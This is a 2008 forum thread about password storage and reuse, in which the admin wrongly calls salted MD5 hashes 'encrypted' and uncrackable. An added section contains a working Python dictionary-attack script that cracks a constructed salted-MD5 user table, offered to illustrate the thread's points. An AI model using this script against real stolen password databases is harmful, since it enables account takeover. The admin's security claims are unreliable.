EntropiaForum.com
Technical: Technical discussion about your computer and Entropia Universe system requirements.
05-18-2008, 14:41 #11
Netaquel
Sec reminder

Hi all

Security is a real problem.

EF I trust; that is why I post here. A sentence of trust in EF was in the original post but I removed it - EF is a forum too. And the owner - Neo - is known in the community and probably does not want to make a mess of his own reputation.

But still, the database can be stolen. That passwords are not in clear form (some hash: MD5, SHA, etc.) makes just a few days' difficulty for thieves - brute-force cracking or dictionary words... Piece of cake if you have the hash of the password.

But there are many forums! Nearly every society has one; even new societies make forums, and in the soc terminal you can read "forum registration required".

If you do not use your EU password on a forum, you can still use your mail account password on some forum. And EU is not the whole world: data collected from forums can be used to crack a Visa card: birth date, RL name, etc., etc. Too many security threats to name them all... Even a mail address is valuable for some kinds of business creatures, spammers for example.

The main reason that made me post was EU Tracker. It was a new tool for me, and the amount of data collected during registration made me post. But still, I registered an account in EUT, so I have nothing against the EUT crew. Nor any other forum I know, as I said in my first post.

Still, I think it is good to remind that there is no such thing as 100% security, on any forum, tool, online bank or EU (with GC too). There are just harder-to-crack things, and THIS IS WHAT EVERY SECURITY SPECIALIST WILL SAY. What a marketing specialist says is another topic. If someone really wanted to crack "ANY AVATAR NAME HERE" or any bank on Earth and had some RL money, he would break what he wants. Probably an avatar account sooner than an online bank.

We just need to avoid traps - things that wait for a false move.

The second thing I reminded in my first post was: IF YOU ARE A BAD GUY YOU ARE NOT ALLOWED TO DO BAD THINGS. Please do not comment about this particular subject; maybe it will be useful for someone.

And sorry Kaiser, you have a bad nose. I will never have a big post counter and have no idea whether it is useful for something. Is it? Never say never, of course; we will see what happens, but I am not that kind of person. I just have some free time from EU, and the mining forum was boring lately...

Net
05-18-2008, 15:43 #12
extince
Marksmanship

Quote:
Originally Posted by 711 View Post
Good suggestion.

For the record, and to set members' minds at ease, EntropiaForum.com does not store member passwords, but rather stores an encrypted hash of the password. Thus, it is impossible for me or anyone else to extract any member's forum password from the EF database, since the actual password is not even stored anywhere.
In theory you can do MD5 collision checks... sure, I guess the passwords have a salt within the MD5, but still, in theory it is possible to get the password back in plaintext. Many examples from Sweden about that issue (sites get hacked and databases start to spread; even with salt they succeed in getting passwords from them).

But I guess you as admin don't have any interest in it.
05-18-2008, 21:53 #13
Omnedon

Quote:
Originally Posted by extince View Post
In theory you can do MD5 collision checks... sure, I guess the passwords have a salt within the MD5, but still, in theory it is possible to get the password back in plaintext. Many examples from Sweden about that issue (sites get hacked and databases start to spread; even with salt they succeed in getting passwords from them).
This is generally known as a brute-force attack (simplified as a dictionary attack, since most people use "common" words as passwords), which is throwing everything through the MD5 routine and checking to see if anything that comes out matches an encrypted password in the database.

The only reasonable defense is the use of longer passwords with more complexity. That still won't be entirely safe (if the attacker has a copy of the password database) but will increase the time needed to yield anything useful.

Don't use your name, street address, birthdate, or any other "common" words as a password and you make your account much harder to crack.

Quote:
Originally Posted by extince View Post
But I guess you as admin don't have any interest in it.
What exactly are the admins supposed to do to "show interest"? Unless they are "teh ubar programmers", other than the use of forum software that encrypts passwords and making sure the server is secure (which is behind the scenes), there is not really much they can do.
05-18-2008, 22:18 #14
711 (EntropiaForum Owner/Admin)

Quote:
Originally Posted by Netaquel View Post
Hi all

But still, the database can be stolen. That passwords are not in clear form (some hash: MD5, SHA, etc.) makes just a few days' difficulty for thieves - brute-force cracking or dictionary words... Piece of cake if you have the hash of the password.
Quote:
Originally Posted by extince View Post
In theory you can do MD5 collision checks... sure, I guess the passwords have a salt within the MD5, but still, in theory it is possible to get the password back in plaintext. Many examples from Sweden about that issue (sites get hacked and databases start to spread; even with salt they succeed in getting passwords from them).

But I guess you as admin don't have any interest in it.
Please read my post again.

The EF software does not store the password in encrypted format. It stores an encrypted, salted MD5 hash of the password. So even if someone were able to hack into the EF database server (very unlikely; the EF servers are very secure) and then crack the salted MD5 encryption (which has never been accomplished by anyone in the world, to my knowledge), they would still only have the hash of the password, not the password itself. As I said, member passwords are not stored anywhere in the forum database, encrypted or otherwise.

However, it should be noted that a malicious webmaster could theoretically capture passwords from form fields before they are submitted to the database, by using a slightly modified stock vBulletin or similar forum software, so one still needs to be careful. My explanation above was more intended to set members' minds at ease that it is extremely unlikely that someone could extract such information from EF's database, even if they were successful in gaining unauthorized access to the servers somehow.

Thus, it is still good security practice to use a password different from the one you use for sensitive or financial websites, such as your Entropia Universe login.
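The storage scheme 711 describes in post #14 is the one vBulletin 3.x (the software in this page's footer) used: md5(md5(password) + salt), with the salt kept in the same user row as the hash. The example below is added for this page; it is not EF's or vBulletin's own code. It walks through what extince (post #12) and Omnedon (post #13) describe: an attacker holding a stolen table does not decrypt anything, because a hash is not encryption. He guesses candidate passwords, hashes each one with that row's salt, and compares. The usernames, salts, passwords and wordlist are all constructed; the 3-character salt length is an assumption about vBulletin 3 of that era (later versions lengthened it), not a claim about EF's database.

```python
"""Dictionary attack against a stolen vBulletin-3-style salted-MD5 user table.

Added example, not code from the page or from vBulletin. Shows that a salted
hash is guessed, never "decrypted"; that the per-user salt only removes the
precomputed-table and cross-user shortcuts; and that the surviving account is
the one whose password is not derivable from a wordlist.
"""
import hashlib
import secrets
import string

SALT_ALPHABET = string.ascii_letters + string.digits


def vb3_hash(password: str, salt: str) -> str:
    """vBulletin 3.x stored md5(md5(password) + salt), hex encoded.
    The salt lives in the same row, so whoever steals the table has it too."""
    inner = hashlib.md5(password.encode("utf-8")).hexdigest()
    return hashlib.md5((inner + salt).encode("utf-8")).hexdigest()


def make_salt(length: int = 3) -> str:
    """Random salt. 3 characters is an assumption about vBulletin 3 of this era;
    later versions lengthened it. The length is a parameter, not a claim about EF."""
    return "".join(secrets.choice(SALT_ALPHABET) for _ in range(length))


def make_row(username: str, password: str, salt: str):
    """One row of the user table as a thief would see it: name, hash, salt."""
    return (username, vb3_hash(password, salt), salt)


# Constructed sample table with fixed salts so the run is deterministic.
# Passwords are the kinds the thread warns about: a dictionary word, a game
# term plus a digit, and name+birth year. 'tamryn' holds a long passphrase.
STOLEN_TABLE = [
    make_row("netaquel", "password", "xK2"),
    make_row("extince", "Calypso1", "q9L"),
    make_row("omnedon", "tamryn1980", "Bh7"),
    make_row("outman", "password", "m4Z"),   # same password as netaquel, different salt
    make_row("tamryn", "ruby rain over port atlantis", "Pp1"),
]

# Constructed wordlist seed: common words, in-game terms, first names.
BASE_WORDS = ["password", "calypso", "entropia", "letmein", "tamryn", "daniel"]


def expand_wordlist(base_words, years=range(1960, 2000)):
    """Cheap mangling rules: case variants, digit suffix, name + birth year.
    This is the 'dictionary attack' Omnedon describes, not an exhaustive search."""
    for w in base_words:
        for cand in (w, w.capitalize(), w.upper()):
            yield cand
            for d in range(10):
                yield f"{cand}{d}"
        for y in years:
            yield f"{w}{y}"


def dictionary_attack(rows, wordlist):
    """Guess-and-compare against every row. Returns (cracked, hashes_computed).

    The per-user salt forces one hash per (candidate, user) instead of one per
    candidate and makes a precomputed MD5 table useless, but a single MD5 is
    still cheap, so a short wordlist finishes in well under a second."""
    candidates = list(wordlist)
    cracked = {}
    hashes = 0
    for user, stored, salt in rows:
        for cand in candidates:
            hashes += 1
            if vb3_hash(cand, salt) == stored:
                cracked[user] = cand
                break
    return cracked, hashes


def same_password_same_hash(rows) -> bool:
    """True if any two rows share a hash. With per-user salts this is False even
    when two users share a password, which is the one thing the salt buys."""
    hashes = [h for _, h, _ in rows]
    return len(hashes) != len(set(hashes))


if __name__ == "__main__":
    cracked, n = dictionary_attack(STOLEN_TABLE, expand_wordlist(BASE_WORDS))
    print(f"{len(cracked)} of {len(STOLEN_TABLE)} accounts cracked after {n} MD5 computations")
    for user, pw in cracked.items():
        print(f"  {user}: {pw}")
    print("identical hashes across users:", same_password_same_hash(STOLEN_TABLE))
```

Run as-is, four of the five constructed accounts fall after a few hundred MD5 computations. The salt did its one job: the two users who share "password" have different hashes, so a precomputed table is useless. It does nothing against per-account guessing, since a desktop core of that era computes millions of MD5s per second. The account that survives is the one whose password is not reachable from a wordlist plus mangling rules, which is Omnedon's point, and it is why reusing a forum password on the EU login is the real risk in this thread.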
05-18-2008, 23:05 #15
Outman

Yeah, as long as your EF pass is different from your EU pass you're fine (not sure why someone would take an EF account). Also, if your password is the same, there are trillions of possible usernames, and they should differ from your avatar name. I guess the big risk is when a keylogger is on your computer.
The biggest worry would be someone hacking the EU server. It would be a hard thing to do, but there are people who could do it. It is a big target (I think), considering one could wreak chaos on the economy, making tons of money, stealing accounts and collecting credit card numbers. Also, the fact that it would be the first RCE hacked would give the hacker some media attention.

Last edited by Outman; 05-18-2008 at 23:17.
__________________
I tried to craft in real life. Turns out sticking a bunch of rocks in a washing machine just breaks the machine.
05-19-2008, 12:03 #16
Netaquel
Sec reminder

Hi all,

I know security is a big problem and hard to discuss too. So I want to repeat: EF is one of the forums we trust most! If I can speak for others.

But look at the ad on the main page - the banner about rip-offs... So it looks like talking about hard things is necessary...

I consider that the thread can be closed now. But someday someone can write another reminder, and it will be a good thing, IMO.

Best regards all,

Net
Copyright ©2005 - 2008, EntropiaForum.com.
Entropia Universe is a registered trademark of Mindark PE AB.
All other copyrights and trademarks are property of their respective owners.
Powered by vBulletin® Version 3.7.1
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.